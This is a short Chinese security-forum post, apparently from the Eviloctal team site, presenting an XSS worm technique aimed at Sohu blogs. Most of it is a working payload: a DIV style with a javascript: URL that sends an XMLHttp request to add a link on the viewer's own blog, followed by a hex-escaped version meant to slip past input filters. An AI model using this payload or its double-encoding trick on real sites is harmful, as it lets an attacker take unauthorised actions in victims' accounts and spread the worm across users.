文章作者：茄子宝

信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

看到梦之光芒放出来了!我也不藏了!

10月7日的时候我就发的日志,提示了大家!这里算是上次发的XSSWORM初尝试的续吧.

其实很简单,就是两次转码.

<DIVSTYLE="background-image:url(javascript:varXmlHttp=newActiveXObject("Microsoft.XMLhttp");XmlHttp.Open("get","/manage/link.do?m=add&title=S0n9%20bl09&desc=This%20is%20XSS%20TEST%20%21&link=http%3A//s0n9.blog.sohu.com&_",true);XmlHttp.send(null);)">

ASCII转码参考http://s0n9.blog.sohu.com/16002288.html

写成下面16进制转义字符串

<divstyle="background-image:07507206C02806A06107606107306307206907007403A06507606106C02805307407206906E06702E06607206F06D04306806107204306F06......"></div>